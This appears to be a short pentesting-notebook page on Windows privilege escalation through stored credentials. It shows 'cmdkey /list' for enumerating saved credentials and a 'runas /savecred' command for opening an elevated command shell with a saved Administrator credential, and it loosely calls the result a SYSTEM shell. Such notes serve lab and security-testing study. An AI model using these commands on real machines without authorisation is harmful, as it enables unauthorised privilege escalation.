Runas
Windows Credential Manager
Windows Credential Manager is a Windows built-in password manager that holds all the stored credentials. It can be access by visiting "Control Panel -> User Accounts -> Credential Manager". In command line, it can be accessed by the cmdkey
command:
cmdkey /list
If Administrator's stored credential is found, we can call runas.exe
to get a SYSTEM shell.
Runas
Call runas.exe
to get a SYSTEM shell if Administrator's stored credential is found in Windows Credential Manager:
C:\Windows\System32\runas.exe /savecred /user:<username> /profile "C:\Windows\System32\cmd.exe"
Last updated
Was this helpful?